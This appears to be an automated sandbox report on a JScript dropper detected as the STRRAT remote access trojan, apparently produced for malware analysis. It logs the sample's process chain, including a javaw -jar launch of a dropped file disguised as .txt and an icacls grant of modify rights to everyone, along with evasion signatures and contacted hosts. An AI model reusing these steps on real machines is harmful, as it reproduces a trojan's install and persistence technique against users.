Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0214C477 push 00000000h; mov dword ptr [esp], esp 1_2_0214C49D
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000003.1781528179.000000001466B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021403C0 cpuid 1_2_021403C0
Queries the installed Java version
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7560 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\7123lock.file VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected STRRAT
Source: Yara match File source: 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected STRRAT
Source: Yara match File source: 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538416 Sample: 8NR95Z54o9.js Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 22 repo1.maven.org 2->22 24 github.com 2->24 26 dualstack.sonatype.map.fastly.net 2->26 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 7 other signatures 2->40 9 wscript.exe 1 2 2->9         started        signatures3 process4 file5 20 C:\Users\user\AppData\Roaming\qkviumto.txt, Zip 9->20 dropped 42 JScript performs obfuscated calls to suspicious functions 9->42 44 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->44 13 javaw.exe 23 9->13         started        signatures6 process7 dnsIp8 28 github.com 140.82.121.3, 443, 49744, 49749 GITHUBUS United States 13->28 30 140.82.121.4, 443, 49769, 49773 GITHUBUS United States 13->30 32 2 other IPs or domains 13->32 16 icacls.exe 1 13->16         started        process9 process10 18 conhost.exe 16->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
199.232.192.209
 dualstack.sonatype.map.fastly.net United States
54113 FASTLYUS false
140.82.121.3
 github.com United States
36459 GITHUBUS false
140.82.121.4
 unknown United States
36459 GITHUBUS false
199.232.196.209
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true
dualstack.sonatype.map.fastly.net 199.232.192.209 true
repo1.maven.org unknown unknown